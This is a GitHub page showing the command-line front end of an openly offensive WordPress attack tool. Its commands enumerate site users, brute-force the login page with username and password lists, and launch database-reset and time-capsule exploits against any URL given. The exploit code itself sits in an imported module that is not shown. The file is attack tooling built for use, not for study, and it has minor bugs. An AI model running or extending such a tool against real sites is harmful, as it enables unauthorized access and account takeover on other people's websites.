-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathcli.py
143 lines (121 loc) · 5.6 KB
/
cli.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
#!/usr/bin/python3
import click
from wordpress import WPEnumerator, WPPassBruteforcer, WPDatabaseResetExploiter, WPTimeCapsuleExploiter, WPDetector
DEFAULT_TIMEZONE = 'Israel'
DEFAULT_FILES_GLOB_LIST = ["cleaning_algorithm-*.log", "*.dump"]
@click.group()
def cli():
pass
@click.command(help="This command using to enumerate WordPress System users if possible.")
@click.option('-u', '--url', help='Full url you wish to scan, for example: https://example.com', required=True)
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('--minid', help='Start enumerate from this user id', type=int)
@click.option('--maxid', help='Finish enumerate with this user id', type=int)
def enumerate(url, proxy, minid, maxid):
proxies = None
if proxy is not None:
proxies = {'http': proxy, 'https': proxy}
enumerator = WPEnumerator(url)
is_possible = enumerator.enumerate(minid, maxid, proxies)
version = "Unknown"
print(" ======== SUMMARY ========")
if is_possible:
data = enumerator.get_users_data()
print("Data: {}".format(data))
else:
print("{} enumeration is not possible for this url.".format(url))
print("Done.")
@click.command(
help="This command using to detect if website is running WordPress System, Provide also the version if possible.")
@click.option('-u', '--url', help='Full url you wish to scan, for example: https://example.com', required=True)
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('-to', '--timeout', help='Maximum timeout for each http request (msecs, only integer)', type=int)
def detect(url, proxy, timeout):
proxies = None
if proxy is not None:
proxies = {'http': proxy, 'https': proxy}
detector = WPDetector(url, proxies=proxies, timeout=timeout)
is_wp = detector.detect()
version = "Unknown"
if is_wp:
version = detector.detect(url)
print(" ======== SUMMARY ========")
if is_wp:
print("{} is WordPress System, running version {}".format(url, version))
else:
print("{} is NOT WordPress System.".format(url, is_wp))
print("Done.")
@click.command(help="This command using to print the readme file.")
def readme():
print("GIT: https://github.com/eliranmaman/WP-Exploiter")
try:
with open('README.md', 'r') as file:
for line in file.readlines():
print(line)
except BaseException as e:
print(e)
print("Could not read README file, please visit: https://github.com/eliranmaman/WP-Exploiter")
@click.command(
help="This command using to bruteforcing the WordPress login system, if possible.")
@click.option('-u', '--url', help='Full url you wish to scan, for example: https://example.com', required=True)
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('-un', '--usernames', help='PAth to file containing usernames, each username separate line.', type=str, required=True)
@click.option('-pass', 'passwords', help='path to file containing passwords, each password separate line.', required=True)
@click.option('-t', '--threads', help='Num of threads to use, default is 1', type=int, default=1)
def bruteforce(url, proxy, usernames, passwords, threads):
proxies = None
if proxy is not None:
proxies = {'http': proxy, 'https': proxy}
bf = WPPassBruteforcer(url, proxies=proxies)
is_bf_possible = bf.is_method_possible()
data = {}
if is_bf_possible:
with open(usernames, 'r') as file:
usernames = file.readlines()
with open(passwords, 'r') as file:
passwords = file.readlines()
data = bf.bruteforce(usernames, passwords, proxies=proxy, threads=threads)
print(" ======== SUMMARY ========")
if is_bf_possible:
print("Cracked data: {}".format(data))
else:
print("Bruteforce is not an option for this url {}".format(url))
print("Done.")
@click.command(
help="This command using to bruteforcing the WordPress login system, if possible.")
@click.option('-u', '--url', help='Full url you wish to exploite, for example: https://example.com', required=True)
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('-ex', '--type', help='The exploit you want to try [all, time-capsule, database-reset]', type=str,
required=True)
def exploit(url, proxy, type):
if type not in ['all', 'time-capsule', 'database-reset']:
print("Unknown exploit {}, please choose from [all, time-capsule, database-reset]".format(type))
raise SystemExit
proxies = None
if proxy is not None:
proxies = {'http': proxy, 'https': proxy}
if type == 'all' or type == 'database-reset':
exploiter = WPDatabaseResetExploiter(url, proxies=proxies)
is_ex_possible = exploiter.is_vulnerable()
if is_ex_possible:
# if exploit_data is None => the exploit will register new user.
exploiter.exploit()
else:
print("# Exploit via WPDatabaseResetExploiter is not possible for this site.")
if type == 'time-capsule' or type == 'all':
exploiter = WPTimeCapsuleExploiter(url)
is_ex_possible = exploiter.is_vulnerable()
if is_ex_possible:
exploiter.exploit()
else:
print("# Exploit via WPTimeCapsuleExploiter is not possible for this site.")
print("Done.")
cli.add_command(detect)
cli.add_command(readme)
cli.add_command(enumerate)
cli.add_command(bruteforce)
cli.add_command(exploit)
def main():
cli()
if __name__ == '__main__':
main()